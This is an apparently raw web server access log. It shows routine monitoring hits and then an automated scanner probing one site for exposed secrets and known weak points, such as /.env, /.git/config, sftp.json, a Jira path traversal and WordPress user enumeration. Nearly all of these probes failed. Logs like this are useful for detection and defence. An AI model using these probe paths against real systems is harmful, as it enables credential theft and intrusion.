212.91.246.72 - - [02/Mar/2023:21:49:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "HELP" 501 319 "-" "-"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800065) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /s/7383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.22.74.203 - - [02/Mar/2023:21:54:34 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
